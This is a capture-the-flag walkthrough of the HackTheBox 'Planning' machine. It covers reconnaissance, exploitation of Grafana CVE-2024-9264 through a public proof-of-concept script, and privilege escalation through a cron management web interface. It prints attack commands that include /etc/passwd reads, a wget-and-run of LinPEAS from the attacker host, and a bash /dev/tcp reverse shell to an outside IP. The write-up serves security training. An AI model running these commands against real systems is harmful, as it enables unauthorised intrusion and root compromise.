HTB Planning

Overview

#

Planning is an Easy-rated Linux box from HackTheBox that involves exploiting a vulnerable Grafana instance and escalating privileges through a misconfigured cron job management interface. This walkthrough will guide you through each step of the penetration testing process.

Box Information

#

Reconnaissance

#

Initial Port Scan

#

Let’s start with a comprehensive nmap scan to identify open ports and running services:

1

nmap -sV -sC -A 10.10.11.68

Scan Results:

1
2
3
4
5

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.11 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx 1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to http://planning.htb/
|_http-server-header: nginx/1.24.0 (Ubuntu)

The scan reveals two open ports:

• Port 22/tcp: SSH service (OpenSSH 9.6p1)
• Port 80/tcp: HTTP service (nginx 1.24.0) redirecting to planning.htb

  

Host Configuration

#

Add the target hostname to your /etc/hosts file:

1

echo "10.10.11.68 planning.htb" >> /etc/hosts

Web Application Analysis

#

Visiting http://planning.htb reveals an Education Courses webpage with minimal functionality. The site appears to be static with no obvious attack vectors.

Subdomain Enumeration

#

Since the main site doesn’t offer much, let’s enumerate subdomains using ffuf:

1

ffuf -u http://planning.htb/ -w /usr/share/fuzzDicts/subdomainDicts/main.txt -H "Host:FUZZ.planning.htb" -fs 178

✅ Discovery: Found grafana.planning.htb subdomain

1

echo "10.10.11.68 grafana.planning.htb" >> /etc/hosts

Initial Access

#

Grafana Discovery

#

Accessing http://grafana.planning.htb reveals a Grafana login interface. This is promising as Grafana has had several known vulnerabilities.

Authentication

#

Using the credentials provided in the box description:

• Username: admin
• Password: 0D5oT70Fq13EvB5r

The credentials successfully authenticate us into the Grafana instance.

Grafana Exploitation

#

With valid credentials, we can exploit the Grafana instance. For this box, the vulnerability is CVE-2024-9264: Grafana Post-Auth DuckDB SQL Injection (RCE, File Read).

Proof of Concept (PoC)

#

This PoC leverages the public exploit from nollium/CVE-2024-9264:

• Install dependencies:

  1	pip install -r requirements.txt

• File Read (works on all vulnerable versions):

  1	python3 CVE-2024-9264.py -u admin -p 0D5oT70Fq13EvB5r -f /etc/passwd http://grafana.planning.htb

• Command Execution (Grafana v11.0.0 only):

  1	python3 CVE-2024-9264.py -u admin -p 0D5oT70Fq13EvB5r -c 'id' http://grafana.planning.htb

• Arbitrary DuckDB query (e.g., get environment variable):

  1	python3 CVE-2024-9264.py -u admin -p 0D5oT70Fq13EvB5r -q "SELECT getenv('PATH')" http://grafana.planning.htb

The exploit works by creating a dashboard with an expression, intercepting the request, and modifying the datasource type from math to sql. The PoC script automates this process and allows file read or command execution depending on the Grafana version and server configuration.

ℹ️ Note: The specific exploit depends on the Grafana version. Common vulnerabilities include path traversal, SQL injection, or authentication bypass. For CVE-2024-9264, the DuckDB binary must be present on the server for full exploitation.

SSH Access

#

The Grafana exploitation reveals credentials for user enzo. We can directly SSH into the system:

1

ssh enzo@planning.htb

✅ Achievement: Successfully obtained user.txt

Privilege Escalation

#

System Enumeration

#

Now that we have user access, let’s enumerate the system for privilege escalation paths. We’ll use LinPEAS for comprehensive enumeration.

Setup HTTP Server (Attacker Machine):

1

python3 -m http.server 8080

Download and Execute LinPEAS (Target Machine):

1
2
3

wget http://10.10.14.188:8080/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

Key Discoveries

#

Interesting Files

#

LinPEAS identifies several interesting findings, including a suspicious file at /opt/crontabs/crontab.db:

1

cat /opt/crontabs/crontab.db

Internal Services

#

The enumeration reveals an internal service running on port 8000 (localhost only). This suggests there’s a web application accessible only from within the system.

Port Forwarding

#

To access the internal service on port 8000, we’ll establish an SSH tunnel:

1

ssh -L 8000:localhost:8000 enzo@planning.htb

Crontab Management Interface

#

Accessing http://localhost:8000 using the credentials found in the crontab database reveals a Crontab Management UI. This web interface allows users to create, modify, and execute scheduled tasks.

⚠️ Security Risk: A web interface for cron job management running with elevated privileges poses a significant security risk.

Root Access Exploitation

#

We can exploit this interface to execute commands with root privileges:

1. Setup Netcat Listener (Attacker Machine):

   1	nc -lnvp 4444

2. Create Malicious Cron Job:

   • Navigate to the Crontab UI
   • Click “New” to create a new cron job
   • Enter the following reverse shell command:

     1	bash -c 'exec bash -i &>/dev/tcp/10.10.14.188/4444 <&1'

   

   • Save the job

3. Execute the Job:

   • Click “Run Now” to immediately execute the cron job

   

   • Check your netcat listener for the incoming connection

✅ Achievement: Root shell obtained! You can now access root.txt

Attack Summary

#

Attack Path Visualization

#

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12

graph TD
    A[Initial Scan] --> B[Subdomain Enumeration]
    B --> C[Grafana Discovery]
    C --> D[Credential Authentication]
    D --> E[Grafana Exploitation]
    E --> F[SSH as enzo]
    F --> G[System Enumeration]
    G --> H[Internal Service Discovery]
    H --> I[Port Forwarding]
    I --> J[Crontab UI Access]
    J --> K[Malicious Cron Job]
    K --> L[Root Shell]

Key Vulnerabilities

#

1. Weak Authentication: Default/weak credentials on Grafana
2. Grafana Exploitation: Vulnerable Grafana version allowing code execution
3. Insecure Cron Management: Web interface with elevated privileges
4. Poor Access Controls: Internal services accessible via port forwarding

Security Recommendations

#

• Change Default Credentials: Always change default passwords on administrative interfaces
• Update Software: Keep Grafana and other services updated to latest versions
• Limit Interface Access: Restrict access to management interfaces
• Network Segmentation: Implement proper network controls to prevent lateral movement
• Principle of Least Privilege: Avoid running services with unnecessary elevated privileges

Lessons Learned

#

This box demonstrates several common security misconfigurations:

1. Default Credentials: The initial access was gained through provided credentials, highlighting the importance of changing default passwords
2. Internal Service Security: Even internal services need proper security controls
3. Privilege Management: Web interfaces should not run with root privileges without proper safeguards

Conclusion

#

Planning is an excellent beginner-friendly box that teaches fundamental penetration testing concepts including reconnaissance, web application exploitation, and privilege escalation. The attack path is straightforward but educational, demonstrating real-world misconfigurations commonly found in enterprise environments.

Flags

#

• User Flag: /home/enzo/user.txt
• Root Flag: /root/root.txt

ℹ️ Disclaimer: This writeup is for educational purposes only. Always ensure you have proper authorization before testing these techniques on any system.

🚨 CVE-2024-9264: Grafana SQL Expressions Remote Code Execution

• Severity: Critical (CVSS 9.4)
• Affected Product: Grafana v11.0.0 (and other 11.x versions)
• Vulnerability: The experimental SQL Expressions feature allows insufficiently sanitized DuckDB queries, leading to command injection and local file inclusion. Any authenticated user (Viewer or higher) can exploit this if the duckdb binary is present in $PATH.
• Exploit Impact:
  • Remote code execution (RCE) on Grafana v11.0.0
  • Arbitrary file read on all vulnerable versions
• Patched Versions: 11.0.5+security-01, 11.1.6+security-01, 11.2.1+security-01, and later
• Box Version: This box runs Grafana v11.0.0, which is fully exploitable for RCE and file read.

References:

• Grafana Security Advisory
• nollium/CVE-2024-9264 PoC